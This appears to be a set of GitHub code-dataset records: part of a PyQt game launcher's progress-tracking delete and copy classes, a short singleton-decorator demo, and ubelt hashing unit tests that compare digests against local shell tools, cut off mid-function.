    '''\n ).format(\n image_file_name=process['image_file_name'],\n pid=process['pid'])\n\n retry_msgbox.setText(text)\n retry_msgbox.setInformativeText(_('Do you want to '\n 'retry removing this directory?'))\n retry_msgbox.addButton(\n _('Retry removing the directory'),\n QMessageBox.YesRole)\n retry_msgbox.addButton(_('Cancel the operation'),\n QMessageBox.NoRole)\n retry_msgbox.setIcon(QMessageBox.Critical)\n\n if retry_msgbox.exec() == 1:\n self.deleting = False\n self.stop()\n break\n\n self.deleting = False\n self.delete_completed = True\n self.stop()\n else:\n while os.path.exists(self.current_entry.path):\n try:\n if self.current_entry.is_dir():\n try:\n os.rmdir(self.current_entry.path)\n except OSError:\n # Remove read-only and try again\n os.chmod(self.current_entry.path, stat.S_IWRITE)\n os.rmdir(self.current_entry.path)\n elif self.current_entry.is_file():\n try:\n os.unlink(self.current_entry.path)\n except OSError:\n # Remove read-only and try again\n os.chmod(self.current_entry.path, stat.S_IWRITE)\n os.unlink(self.current_entry.path)\n except OSError as e:\n retry_msgbox = QMessageBox()\n retry_msgbox.setWindowTitle(\n _('Cannot remove directory'))\n\n process = None\n if e.filename is not None:\n process = find_process_with_file_handle(e.filename)\n\n text = _('''\n

    The launcher failed to remove the following directory: {directory}

    \n

    When trying to remove or access {filename}, the launcher raised the\nfollowing error: {error}

    ''').format(\n directory=html.escape(self.src),\n filename=html.escape(e.filename),\n error=html.escape(e.strerror))\n\n if process is None:\n text = text + _('''\n

    No process seems to be using that file or directory.

    ''')\n else:\n text = text + _('''\n

    The process {image_file_name} ({pid}) is currently using\nthat file or directory. You might need to end it if you want to retry.

    '''\n ).format(image_file_name=process['image_file_name'],\n pid=process['pid'])\n\n retry_msgbox.setText(text)\n retry_msgbox.setInformativeText(_('Do you want to '\n 'retry removing this directory?'))\n retry_msgbox.addButton(\n _('Retry removing the directory'),\n QMessageBox.YesRole)\n retry_msgbox.addButton(_('Cancel the operation'),\n QMessageBox.NoRole)\n retry_msgbox.setIcon(QMessageBox.Critical)\n\n if retry_msgbox.exec() == 1:\n self.deleting = False\n self.stop()\n break\n\n self.current_entry = None\n self.deleted_files += 1\n\n self.progress_bar.setValue(self.deleted_files)\n def display_entry(self, entry):\n if self.status_label is not None:\n entry_rel_path = os.path.relpath(entry.path, self.src)\n self.status_label.setText(\n _('Deleting {name} - {entry}').format(name=self.name,\n entry=entry_rel_path))\n\n def start(self):\n self.started = True\n self.status_bar.clearMessage()\n self.status_bar.busy += 1\n\n self.analysing = True\n status_label = QLabel()\n status_label.setText(_('Analysing {name}').format(name=self.name))\n self.status_bar.addWidget(status_label, 100)\n self.status_label = status_label\n\n self.total_files = 0\n\n self.timeout.connect(self.step)\n\n self.current_scan = None\n self.next_scans = deque()\n self.source_entries = deque()\n\n super(ProgressRmTree, self).start(0)\n\n def stop(self):\n super(ProgressRmTree, self).stop()\n\n if self.started:\n self.status_bar.busy -= 1\n if self.status_label is not None:\n self.status_bar.removeWidget(self.status_label)\n if self.progress_bar is not None:\n self.status_bar.removeWidget(self.progress_bar)\n\n if self.delete_completed:\n self.completed.emit()\n else:\n self.aborted.emit()\n\n\n# Recursively copy an entire directory tree while showing progress in a\n# status bar. Optionally skip files or directories.\nclass ProgressCopyTree(QTimer):\n completed = pyqtSignal()\n aborted = pyqtSignal()\n\n def __init__(self, src, dst, skips, status_bar, name):\n if not os.path.isdir(src):\n raise OSError(_(\"Source path '%s' is not a directory\") % src)\n if os.path.exists(dst):\n raise OSError(_(\"Destination path '%s' already exists\") % dst)\n\n super(ProgressCopyTree, self).__init__()\n\n self.src = src\n self.dst = dst\n self.skips = skips\n\n self.status_bar = status_bar\n self.name = name\n\n self.started = False\n self.callback = None\n\n self.status_label = None\n self.copying_speed_label = None\n self.copying_size_label = None\n self.progress_bar = None\n\n self.source_file = None\n self.destination_file = None\n\n self.analysing = False\n self.copying = False\n self.copy_completed = False\n\n def step(self):\n if self.analysing:\n if self.current_scan is None:\n self.current_scan = scandir(self.src)\n else:\n try:\n entry = next(self.current_scan)\n if self.skips is None or entry.path not in self.skips:\n self.source_entries.append(entry)\n if entry.is_dir():\n self.next_scans.append(entry.path)\n elif entry.is_file():\n self.total_files += 1\n self.total_copy_size += entry.stat().st_size\n\n files_text = ngettext('file', 'files',\n self.total_files)\n\n self.status_label.setText(_('Analysing {name} - '\n 'Found {file_count} {files} ({size})').format(\n name=self.name,\n file_count=self.total_files,\n files=files_text,\n size=sizeof_fmt(self.total_copy_size)))\n\n except StopIteration:\n if len(self.next_scans) > 0:\n self.current_scan = scandir(self.next_scans.popleft())\n else:\n self.analysing = False\n\n os.makedirs(self.dst)\n\n if len(self.source_entries) > 0:\n self.copying = True\n\n copying_speed_label = QLabel()\n copying_speed_label.setText(_('{bytes_sec}/s'\n ).format(bytes_sec=sizeof_fmt(0)))\n self.status_bar.addWidget(copying_speed_label)\n self.copying_speed_label = copying_speed_label\n\n copying_size_label = QLabel()\n copying_size_label.setText(\n '{bytes_read}/{total_bytes}'\n .format(bytes_read=sizeof_fmt(0),\n total_bytes=sizeof_fmt(self.total_copy_size))\n )\n self.status_bar.addWidget(copying_size_label)\n self.copying_size_label = copying_size_label\n\n progress_bar = QProgressBar()\n progress_bar.setRange(0, self.total_copy_size)\n progress_bar.setValue(0)\n self.status_bar.addWidget(progress_bar)\n self.progress_bar = progress_bar\n\n self.copied_size = 0\n self.copied_files = 0\n self.copy_speed_count = 0\n self.last_copied_bytes = 0\n self.last_copied = datetime.utcnow()\n self.current_entry = None\n self.source_file = None\n self.destination_file = None\n else:\n self.copy_completed = True\n self.stop()\n\n elif self.copying:\n if self.current_entry is None:\n if len(self.source_entries) > 0:\n self.current_entry = self.source_entries.popleft()\n self.display_entry(self.current_entry)\n else:\n self.copying = False\n self.copy_completed = True\n self.stop()\n elif self.source_file is None and self.destination_file is None:\n relpath = os.path.relpath(self.current_entry.path, self.src)\n dstpath = os.path.join(self.dst, relpath)\n self.dstpath = dstpath\n\n if self.current_entry.is_dir():\n os.makedirs(dstpath)\n self.current_entry = None\n elif self.current_entry.is_file():\n filedir = os.path.dirname(dstpath)\n if not os.path.isdir(filedir):\n os.makedirs(filedir)\n self.source_file = open(self.current_entry.path, 'rb')\n self.destination_file = open(dstpath, 'wb')\n else:\n buf = self.source_file.read(cons.READ_BUFFER_SIZE)\n buf_len = len(buf)\n if buf_len == 0:\n self.source_file.close()\n self.destination_file.close()\n shutil.copystat(self.current_entry.path, self.dstpath)\n self.source_file = None\n self.destination_file = None\n self.current_entry = None\n\n self.copied_files += 1\n else:\n self.destination_file.write(buf)\n\n self.copied_size += buf_len\n self.progress_bar.setValue(self.copied_size)\n\n self.copy_speed_count += 1\n\n if self.copy_speed_count % 10 == 0:\n self.copying_size_label.setText(\n '{bytes_read}/{total_bytes}'\n .format(bytes_read=sizeof_fmt(self.copied_size),\n total_bytes=sizeof_fmt(self.total_copy_size))\n )\n\n delta_bytes = self.copied_size - self.last_copied_bytes\n delta_time = datetime.utcnow() - self.last_copied\n if delta_time.total_seconds() == 0:\n delta_time = timedelta.resolution\n\n bytes_secs = delta_bytes / delta_time.total_seconds()\n self.copying_speed_label.setText(_('{bytes_sec}/s'\n ).format(bytes_sec=sizeof_fmt(bytes_secs)))\n\n self.last_copied_bytes = self.copied_size\n self.last_copied = datetime.utcnow()\n\n\n def display_entry(self, entry):\n if self.status_label is not None:\n entry_rel_path = os.path.relpath(entry.path, self.src)\n self.status_label.setText(\n _('Copying {name} - {entry}').format(name=self.name,\n entry=entry_rel_path))\n\n def start(self):\n self.started = True\n self.status_bar.clearMessage()\n self.status_bar.busy += 1\n\n self.analysing = True\n status_label = QLabel()\n status_label.setText(_('Analysing {name}').format(name=self.name))\n self.status_bar.addWidget(status_label, 100)\n self.status_label = status_label\n\n self.total_copy_size = 0\n self.total_files = 0\n\n self.timeout.connect(self.step)\n\n self.current_scan = None\n self.next_scans = deque()\n self.source_entries = deque()\n\n super(ProgressCopyTree, self).start(0)\n\n def stop(self):\n super(ProgressCopyTree, self).stop()\n\n if self.started:\n self.status_bar.busy -= 1\n if self.status_label is not None:\n self.status_bar.removeWidget(self.status_label)\n if self.progress_bar is not None:\n self.status_bar.removeWidget(self.progress_bar)\n if self.copying_speed_label is not None:\n self.status_bar.removeWidget(self.copying_speed_label)\n if self.copying_size_label is not None:\n self.status_bar.removeWidget(self.copying_size_label)\n\n if self.source_file is not None:\n self.source_file.close()\n if self.destination_file is not None:\n self.destination_file.close()\n\n if self.copy_completed:\n self.completed.emit()\n else:\n self.aborted.emit()\n","repo_name":"remyroy/CDDA-Game-Launcher","sub_path":"cddagl/ui/views/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":141002,"program_lang":"python","lang":"en","doc_type":"code","stars":422,"dataset":"github-code","pt":"72"} +{"seq_id":"35566041252","text":"def single(cls):\n _instance={}\n def aa(*arg,**kwargs):\n if cls not in _instance:\n _instance[cls]=cls(*arg,**kwargs)\n print('========',_instance)\n return _instance[cls]\n return aa\n\n@single\nclass A(object):\n a = 1\n\n def __init__(self, x=0):\n self.x = x\n print('这是A的类的初始化方法')\n\n\na1 = A(2)\na2 = A(3)\nprint(id(a1), id(a2))","repo_name":"shangtianming/flask","sub_path":"2020-04-22/装饰器来写单例模式.py","file_name":"装饰器来写单例模式.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24880497855","text":"import ubelt as ub\nimport itertools as it\nimport uuid\nimport pytest\nfrom ubelt.util_hash import _convert_hexstr_base, _ALPHABET_16\nfrom ubelt.util_hash import _hashable_sequence\nfrom ubelt.util_hash import _rectify_hasher\n\n\ntry:\n import numpy as np\nexcept ImportError:\n np = None\n\n\ndef _benchmark():\n \"\"\"\n On 64-bit processors sha512 may be faster than sha256\n\n References:\n https://crypto.stackexchange.com/questions/26336/sha512-faster-than-sha256\n \"\"\"\n result = ub.AutoOrderedDict()\n algos = ['sha1', 'sha256', 'sha512']\n for n in ub.ProgIter([1, 10, 100, 1000, 10000, 100000], desc='time'):\n # for key in hashlib.algorithms_guaranteed:\n for key in algos:\n hashtype = _rectify_hasher(key)\n t1 = ub.Timerit(100, bestof=10, label=key, verbose=0)\n for timer in t1:\n data = b'8' * n\n with timer:\n hasher = hashtype()\n hasher.update(data)\n result[key][n] = t1.min()\n import pandas as pd\n print(pd.DataFrame(result))\n\n result = ub.AutoOrderedDict()\n for n in ub.ProgIter([1, 10, 100, 1000, 10000, 100000], desc='time'):\n # for key in hashlib.algorithms_guaranteed:\n for key in algos:\n hashtype = _rectify_hasher(key)\n t1 = ub.Timerit(100, bestof=10, label=key, verbose=0)\n for timer in t1:\n data = b'8' * n\n hasher = hashtype()\n hasher.update(data)\n with timer:\n hasher.hexdigest()\n result[key][n] = t1.min()\n import pandas as pd\n print(pd.DataFrame(result))\n \"\"\"\n CommandLine:\n python -m test_hash _benchmark\n\n Example:\n >>> # DISABLE_DOCTEST\n >>> from test_hash import * # NOQA\n >>> result = _benchmark()\n >>> print(result)\n %timeit hashlib.sha256().update(b'8' * 1000)\n 3.62 µs per loop\n %timeit hashlib.sha512().update(b'8' * 1000)\n 2.5 µs per loop\n\n %timeit hashlib.sha256().update(b'8' * 1)\n 318 ns\n %timeit hashlib.sha512().update(b'8' * 1)\n 342 ns\n\n %timeit hashlib.sha256().update(b'8' * 100000)\n 306 µs\n %timeit hashlib.sha512().update(b'8' * 100000)\n 213 µs\n \"\"\"\n\n\ndef test_hash_data_with_types():\n if np is None:\n pytest.skip('requires numpy')\n counter = [0]\n failed = []\n def check_hash(want, input_):\n count = counter[0] = counter[0] + 1\n got = ub.hash_data(input_, hasher='sha512', base='abc', types=True)\n got = got[0:32]\n # assert got.startswith(want), 'want={}, got={}'.format(want, got)\n print('check_hash({!r}, {!r})'.format(got, input_))\n if want is not None and not got.startswith(want):\n item = (got, input_, count, want)\n failed.append(item)\n\n check_hash('egexcbwgdtmjrzafljtjwqpgfhmfetjs', '1')\n check_hash('hjvebphzylxgtxncyphclsjglvmstsbq', ['1'])\n check_hash('hjvebphzylxgtxncyphclsjglvmstsbq', tuple(['1']))\n check_hash('ftzqivzayzivmobwymodjnnzzxzrvvjz', b'12')\n check_hash('jiwjkgkffldfoysfqblsemzkailyridf', [b'1', b'2'])\n check_hash('foevisahdffoxfasicvyklrmuuwqnfcc', [b'1', b'2', b'3'])\n check_hash('foevisahdffoxfasicvyklrmuuwqnfcc', ['1', '2', '3'])\n check_hash('rkcnfxkjwkrfejhbpcpopmyubhbvonkt', ['1', np.array([1, 2, 3], dtype=np.int64), '3'])\n check_hash('lxssoxdkstvccsyqaybaokehclyctgmn', '123')\n check_hash('fpvptydigvgjimbzadztgpvjpqrevwcq', zip([1, 2, 3], [4, 5, 6]))\n\n print(ub.urepr(failed, nl=1))\n assert len(failed) == 0\n\n\ndef test_hash_data_without_types():\n if np is None:\n pytest.skip('requires numpy')\n counter = [0]\n failed = []\n def check_hash(want, input_):\n count = counter[0] = counter[0] + 1\n got = ub.hash_data(input_, hasher='sha1', base='hex', types=False)\n # assert got.startswith(want), 'want={}, got={}'.format(want, got)\n print('check_hash({!r}, {!r})'.format(got, input_))\n if want is not None and not got.startswith(want):\n item = (got, input_, count, want)\n failed.append(item)\n\n check_hash('356a192b7913b04c54574d18c28d46e6395428ab', '1')\n check_hash('d3bcc889aced30afd8e66ae45b310239d79be3df', ['1'])\n check_hash('d3bcc889aced30afd8e66ae45b310239d79be3df', ('1',))\n check_hash('7b52009b64fd0a2a49e6d8a939753077792b0554', b'12')\n check_hash('6bcab1cebcb44fc5c69faacc0ed661b19eff9fef', [b'1', b'2'])\n check_hash('d6d265a904bc7df97bd54a8c2ff4546e211c3cd8', [b'1', b'2', b'3'])\n check_hash('d6d265a904bc7df97bd54a8c2ff4546e211c3cd8', ['1', '2', '3'])\n check_hash('eff59c7c787bd223a680c9d625f54756be4fdf5b', ['1', np.array([1, 2, 3], dtype=np.int64), '3'])\n check_hash('40bd001563085fc35165329ea1ff5c5ecbdbbeef', '123')\n check_hash('1ba3c4e7f5af2a5f38d624047f422553ead2b5ae', zip([1, 2, 3], [4, 5, 6]))\n\n print(ub.urepr(failed, nl=1))\n assert len(failed) == 0\n\n\ndef test_available():\n assert 'sha1' in ub.util_hash._HASHERS.available()\n\n\ndef test_idempotency():\n # When we disable types and join sequence items, the hashable\n # sequence should be idempotent\n nested_data = ['fds', [3, 2, 3], {3: 2, '3': [3, 2, {3}]}, {1, 2, 3}]\n hashable1 = b''.join(_hashable_sequence(nested_data))\n hashable2 = b''.join(_hashable_sequence(hashable1, types=False))\n assert hashable1 == hashable2\n\n\ndef test_special_floats():\n # Tests a fix from version 0.10.3 for inf/nan floats\n # standard_floats = [0.0, 0.1, 0.2]\n data = [\n float('inf'), float('nan'), float('-inf'),\n -0., 0., -1., 1., 0.3, 0.1 + 0.2,\n ]\n expected_encoding = [\n b'_[_',\n b'FLTinf_,_',\n b'FLTnan_,_',\n b'FLT-inf_,_',\n b'FLT\\x00/\\x01_,_',\n b'FLT\\x00/\\x01_,_',\n b'FLT\\xff/\\x01_,_',\n b'FLT\\x01/\\x01_,_',\n b'FLT\\x13333333/@\\x00\\x00\\x00\\x00\\x00\\x00_,_',\n b'FLT\\x04\\xcc\\xcc\\xcc\\xcc\\xcc\\xcd/\\x10\\x00\\x00\\x00\\x00\\x00\\x00_,_',\n b'_]_']\n exepcted_prefix = '3196f80e17de93565f0fc57d98922a44'\n\n hasher = 'sha512'\n encoded = _hashable_sequence(data, types=True)\n hashed = ub.hash_data(data, hasher=hasher, types=True)[0:32]\n print('expected_encoding = {!r}'.format(expected_encoding))\n print('encoded = {!r}'.format(encoded))\n print('hashed = {!r}'.format(hashed))\n print('exepcted_prefix = {!r}'.format(exepcted_prefix))\n assert encoded == expected_encoding\n assert hashed == exepcted_prefix\n _sanity_check(data)\n\n\ndef test_hashable_sequence_sanity():\n data = [1, 2, [3.2, 5]]\n # data = [1]\n _sanity_check(data)\n\n\ndef _sanity_check(data):\n\n hasher_code = 'sha512'\n hasher_type = ub.util_hash._rectify_hasher(hasher_code)\n\n encoded_seq = _hashable_sequence(data, types=False)\n encoded_byt = b''.join(encoded_seq)\n hashed = ub.hash_data(data, hasher=hasher_code, types=False)\n rehashed = ub.hash_data(encoded_byt, hasher=hasher_code, types=False)\n\n hash_obj1 = hasher_type()\n hash_obj1.update(encoded_byt)\n hashed1 = hash_obj1.hexdigest()\n\n hash_obj2 = hasher_type()\n for item in encoded_seq:\n hash_obj2.update(item)\n hashed2 = hash_obj2.hexdigest()\n\n print('encoded_seq = {!r}'.format(encoded_seq))\n print('encoded_byt = {!r}'.format(encoded_byt))\n\n print('hashed = {!r}'.format(hashed))\n print('rehashed = {!r}'.format(rehashed))\n print('hashed1 = {!r}'.format(hashed1))\n print('hashed2 = {!r}'.format(hashed2))\n\n # Sanity check\n ub.hash_data(encoded_seq, hasher=hasher_code, types=False)\n\n seq2 = b''.join(_hashable_sequence(encoded_byt, types=False))\n assert encoded_byt == seq2\n\n tracer1 = ub.util_hash._HashTracer()\n ub.hash_data(encoded_byt, types=False, hasher=tracer1)\n traced_bytes1 = tracer1.hexdigest()\n print('traced_bytes1 = {!r}'.format(traced_bytes1))\n assert traced_bytes1 == encoded_byt\n\n tracer2 = ub.util_hash._HashTracer()\n ub.hash_data(encoded_byt, types=False, hasher=tracer2)\n traced_bytes2 = tracer1.hexdigest()\n print('traced_bytes2 = {!r}'.format(traced_bytes2))\n assert traced_bytes2 == traced_bytes1\n\n\ndef test_numpy_object_array():\n \"\"\"\n _HASHABLE_EXTENSIONS = ub.util_hash._HASHABLE_EXTENSIONS\n \"\"\"\n if np is None:\n pytest.skip('requires numpy')\n # An object array should have the same repr as a list of a tuple of data\n data = np.array([1, 2, 3], dtype=object)\n objhash = ub.hash_data(data)\n assert ub.hash_data([1, 2, 3]) == objhash\n assert ub.hash_data((1, 2, 3)) == objhash\n\n # Ensure this works when the object array is nested\n data = [np.array([1, 2, 3], dtype=object)]\n objhash = ub.hash_data(data)\n assert ub.hash_data([[1, 2, 3]]) == objhash\n assert ub.hash_data([(1, 2, 3)]) == objhash\n assert ub.hash_data(([1, 2, 3],)) == objhash\n\n\ndef test_ndarray_int_object_convert():\n if np is None:\n pytest.skip('requires numpy')\n data_list = [[1, 2, 3], [4, 5, 6]]\n\n data = np.array(data_list, dtype=np.int64)\n\n s1 = b''.join(_hashable_sequence(data.astype(object)))\n s2 = b''.join(_hashable_sequence(data_list))\n s3 = b''.join(_hashable_sequence(data.tolist()))\n s4 = b''.join(_hashable_sequence(data.astype(np.uint8).astype(object)))\n\n assert s1 == s4\n assert s2 == s4\n assert s3 == s4\n\n\ndef test_ndarray_zeros():\n if np is None:\n pytest.skip('requires numpy')\n data = np.zeros((3, 3), dtype=np.int64)\n hashid = ub.hash_data(data)\n assert hashid != ub.hash_data(data.ravel()), (\n 'shape should influence data')\n assert hashid != ub.hash_data(data.astype(np.float32))\n assert hashid != ub.hash_data(data.astype(np.int32))\n assert hashid != ub.hash_data(data.astype(np.int8))\n\n\ndef test_nesting():\n assert _hashable_sequence([1, 1, 1]) != _hashable_sequence([[1], 1, 1])\n assert _hashable_sequence([[1], 1]) != _hashable_sequence([[1, 1]])\n assert _hashable_sequence([1, [1]]) != _hashable_sequence([[1, 1]])\n assert _hashable_sequence([[[1]]]) != _hashable_sequence([[1]])\n\n\ndef test_numpy_int():\n if np is None:\n pytest.skip('requires numpy')\n assert _hashable_sequence(np.int8(3)) == _hashable_sequence(3)\n assert _hashable_sequence(np.int16(3)) == _hashable_sequence(3)\n assert _hashable_sequence(np.int32(3)) == _hashable_sequence(3)\n assert _hashable_sequence(np.int64(3)) == _hashable_sequence(3)\n assert _hashable_sequence(np.uint8(3)) == _hashable_sequence(3)\n assert _hashable_sequence(np.uint16(3)) == _hashable_sequence(3)\n assert _hashable_sequence(np.uint32(3)) == _hashable_sequence(3)\n assert _hashable_sequence(np.uint64(3)) == _hashable_sequence(3)\n\n\ndef test_numpy_float():\n if np is None:\n pytest.skip('requires numpy')\n assert _hashable_sequence(np.float16(3.0)) == _hashable_sequence(3.0)\n assert _hashable_sequence(np.float32(3.0)) == _hashable_sequence(3.0)\n assert _hashable_sequence(np.float64(3.0)) == _hashable_sequence(3.0)\n try:\n assert _hashable_sequence(np.float128(3.0)) == _hashable_sequence(3.0)\n except AttributeError:\n pass\n\n\ndef test_numpy_random_state():\n if np is None:\n pytest.skip('requires numpy')\n data = np.random.RandomState(0)\n # assert ub.hash_data(data).startswith('ujsidscotcycsqwnkxgbsxkcedplzvytmfmr')\n assert ub.hash_data(data, hasher='sha512', types=True, base='abc').startswith('snkngbxghabesvowzalqtvdvjtvslmxve')\n # _hashable_sequence(data)\n\n\ndef test_uuid():\n data = uuid.UUID('12345678-1234-1234-1234-123456789abc')\n sequence = b''.join(_hashable_sequence(data, types=True))\n assert sequence == b'UUID\\x124Vx\\x124\\x124\\x124\\x124Vx\\x9a\\xbc'\n assert ub.hash_data(data, types=True, base='abc', hasher='sha512').startswith('nkklelnjzqbi')\n assert ub.hash_data(data.bytes, types=True) != ub.hash_data(data, types=True), (\n 'the fact that it is a UUID should reflect in the hash')\n assert ub.hash_data(data.bytes, types=False) == ub.hash_data(data, types=False), (\n 'the hash should be equal when ignoring types')\n\n\ndef test_hash_data_custom_base():\n data = 1\n # A larger base means the string can be shorter\n hashid_26 = ub.hash_data(data, base='abc', hasher='sha512', types=True)\n assert len(hashid_26) == 109\n # assert hashid_26.startswith('lejivmqndqzp')\n assert hashid_26.startswith('rfsmlqsjsuzllgp')\n hashid_16 = ub.hash_data(data, base='hex', hasher='sha512', types=True)\n # assert hashid_16.startswith('8bf2a1f4dbea6e59e5c2ec4077498c44')\n assert hashid_16.startswith('d7c9cea9373eb7ba20444ec65e0186b')\n\n assert len(hashid_16) == 128\n # Binary should have len 512 because the default hasher is sha512\n hashid_2 = ub.hash_data(data, base=['0', '1'], hasher='sha512', types=True)\n assert len(hashid_2) == 512\n assert hashid_2.startswith('110101111100100111001110101010010')\n\n\ndef test_hash_file():\n fpath = ub.Path.appdir('ubelt/tests').ensuredir() / 'tmp.txt'\n fpath.write_text('foobar')\n hashid1_a = ub.hash_file(fpath, hasher='sha512', stride=1, blocksize=1)\n hashid2_a = ub.hash_file(fpath, hasher='sha512', stride=2, blocksize=1)\n\n hashid1_b = ub.hash_file(fpath, hasher='sha512', stride=1, blocksize=10)\n hashid2_b = ub.hash_file(fpath, hasher='sha512', stride=2, blocksize=10)\n\n assert hashid1_a == hashid1_b\n assert hashid2_a != hashid2_b, 'blocksize matters when stride is > 1'\n assert hashid1_a != hashid2_a\n\n hashid3_c = ub.hash_file(fpath, hasher='sha512', stride=2, blocksize=10, maxbytes=1000)\n assert hashid3_c == hashid2_b\n\n\ndef test_empty_hash_file():\n fpath = ub.Path.appdir('ubelt/tests').ensuredir() / 'tmp.txt'\n fpath.write_bytes(b'')\n a = ub.hash_file(fpath, hasher='sha512', stride=1, blocksize=1)\n b = ub.hash_file(fpath, hasher='sha512', stride=4, blocksize=4)\n c = ub.hash_file(fpath, hasher='sha512', stride=4, blocksize=4, maxbytes=1)\n d = ub.hash_file(fpath, hasher='sha512', stride=1, blocksize=4, maxbytes=0)\n assert a == b == c == d\n\n\ndef test_convert_base_hex():\n # Test that hex values are unchanged\n for i in it.chain(range(-10, 10), range(-1000, 1000, 7)):\n text = hex(i).replace('0x', '')\n assert _convert_hexstr_base(text, _ALPHABET_16) == text, (\n 'should not change hex')\n\n\ndef test_convert_base_decimal():\n base_10 = list(map(str, range(10)))\n # Test that decimal values agree with python conversion\n for i in it.chain(range(-10, 10), range(-1000, 1000, 7)):\n text_16 = hex(i).replace('0x', '')\n text_10 = _convert_hexstr_base(text_16, base_10)\n assert int(text_16, 16) == int(text_10, 10)\n\n\ndef test_convert_base_simple():\n # Quick one-of tests\n assert _convert_hexstr_base('aaa0111', _ALPHABET_16) == 'aaa0111'\n\n assert _convert_hexstr_base('aaa0111', list('01')) == '1010101010100000000100010001'\n assert _convert_hexstr_base('aaa0111', list('012')) == '110110122202020220'\n assert _convert_hexstr_base('aaa0111', list('0123')) == '22222200010101'\n\n base_10 = list(map(str, range(10)))\n assert _convert_hexstr_base('aaa0111', base_10) == '178913553'\n\n\ndef test_no_prefix():\n full = b''.join(_hashable_sequence(1, types=True))\n part = b''.join(_hashable_sequence(1, types=False))\n # assert full == b'INT\\x00\\x00\\x00\\x01'\n # assert part == b'\\x00\\x00\\x00\\x01'\n assert full == b'INT\\x01'\n assert part == b'\\x01'\n\n\ndef _test_int_bytes():\n assert ub.util_hash._int_to_bytes(0) == b'\\x00'\n assert ub.util_hash._int_to_bytes(1) == b'\\x01'\n assert ub.util_hash._int_to_bytes(2) == b'\\x02'\n assert ub.util_hash._int_to_bytes(-1) == b'\\xff'\n assert ub.util_hash._int_to_bytes(-2) == b'\\xfe'\n assert ub.util_hash._int_to_bytes(600) == b'\\x02X'\n assert ub.util_hash._int_to_bytes(-600) == b'\\xfd\\xa8'\n assert ub.util_hash._int_to_bytes(2 ** 256) == b'\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n assert ub.util_hash._int_to_bytes(-2 ** 256) == b'\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n\n\ndef test_xxhash():\n if 'xxh64' in ub.util_hash._HASHERS.available():\n assert ub.hash_data('foo', hasher='xxh64') == '33bf00a859c4ba3f'\n else:\n pytest.skip('xxhash is not available')\n\n\ndef test_blake3():\n if 'blake3' in ub.util_hash._HASHERS.available():\n assert ub.hash_data('foo', hasher='b3') == '04e0bb39f30b1a3feb89f536c93be15055482df748674b00d26e5a75777702e9'\n else:\n pytest.skip('blake3 is not available')\n\n\ndef test_base32():\n hashstr = ub.hash_data('abc', hasher='sha1', base=32, types=False)\n print(f'hashstr={hashstr}')\n assert hashstr == 'VGMT4NSHA2AWVOR6EVYXQUGCNSONBWE5'\n\n\ndef test_compatible_hash_bases():\n \"\"\"\n Ubelt ~1.2.3 has a ~bug~ incompatability with non-hex hash bases. Depending\n on leftover amount of data in the byte stream, our hex reencoding may be\n incorrect. It is still correct when the input has correct lengths, but in\n general it can produce issues if you were expecting hashes to conform to\n RFC standards.\n\n FIXME: THIS ISSUE IS NOT RESOLVED YET. NEED A WAY OF GETTING COMPATIBLE\n BEHAVIOR WITH STANDARD ENCODINGS. THIS ULTIMATELY REQUIRES PROCESSING DATA\n WITH PADDING AND VIA BYTE FORM, NOT INTEGER FORM.\n\n References:\n https://stackoverflow.com/questions/43920799/convert-byte-to-base64-and-ascii-in-python\n https://github.com/multiformats/multibase\n https://stackoverflow.com/questions/6916805/why-does-a-base64-encoded-string-have-an-sign-at-the-end\n https://github.com/semente/python-baseconv\n \"\"\"\n import pytest\n pytest.skip('FIXME THIS ISSUE IS NOT RESOLVE YET.')\n if not ub.LINUX:\n pytest.skip('only runs on linux')\n required_programs = [\n 'sha256sum', 'cut', 'xxd', 'base32',\n ]\n HAS_PROGS = all(ub.find_exe(p) for p in required_programs)\n if not HAS_PROGS:\n pytest.skip('only runs if required programs exist')\n\n hasher = 'sha1'\n hasher = 'sha256'\n # hasher = 'sha512'\n text = 'foobar'\n\n trace = ub.hash_data(text, hasher=ub.util_hash._HashTracer(), types=False)\n print(f'text={text}')\n print(f'trace={trace}')\n print(f'hasher={hasher}')\n\n hasher_obj = ub.util_hash._rectify_hasher(hasher)()\n hasher_obj.update(trace)\n raw_bytes = hasher_obj.digest()\n print(f'raw_bytes={raw_bytes}')\n import base64\n realb32_encode = base64.b32encode(raw_bytes)\n\n # base64.b32decode(realb32_encode)\n\n print(f'realb32_encode=\\n{realb32_encode}')\n _ = ub.cmd(fr'printf \"{text}\" | {hasher}sum | cut -f1 -d\\ | xxd -r -p', shell=True, system=True)\n # _ = ub.cmd(fr'printf \"{text}\" | {hasher}sum | cut -f1 -d\\ | xxd -r', shell=True, verbose=3)\n\n std_result = ub.cmd(fr'printf \"{text}\" | {hasher}sum', shell=True, verbose=3)['out'].split(' ')[0]\n our_result = ub.hash_data(text, hasher=hasher, types=False)\n print(f'std_result={std_result}')\n print(f'our_result={our_result}')\n assert our_result == std_result\n\n std_result = ub.cmd(fr'printf \"{text}\" | {hasher}sum | cut -f1 -d\\ | xxd -r -p | base32', shell=True, verbose=3)['out'].strip().replace('\\n', '')\n our_result = ub.hash_data(text, hasher=hasher, types=False, base=32)\n std_result_16 = ub.cmd(fr'printf \"{text}\" | {hasher}sum | cut -f1 -d\\ ', shell=True, verbose=3)['out'].strip().replace('\\n', '')\n our_result_16 = ub.hash_data(text, hasher=hasher, types=False, base=16)\n print(f'std_result_16={std_result_16}')\n print(f'our_result_16={our_result_16}')\n\n raw_result = base64.b16decode(our_result_16.upper())\n fix_result = base64.b32encode(raw_result).decode()\n print(f'fix_result={fix_result}')\n print(f'std_result={std_result}')\n print(f'our_result={our_result}')\n assert our_result == std_result\n\n if 1:\n\n hexstr = our_result_16\n base = ub.util_hash._ALPHABET_32\n baselen = len(base)\n # Experimental solution for _convert_hexstr_base\n\n # The alternate code has a bug, but it is concistent so we can't change\n # it. Work towards correct logic is here, which we will eventually\n # introduce as an opt-in change.\n import base64\n raw_bytes = 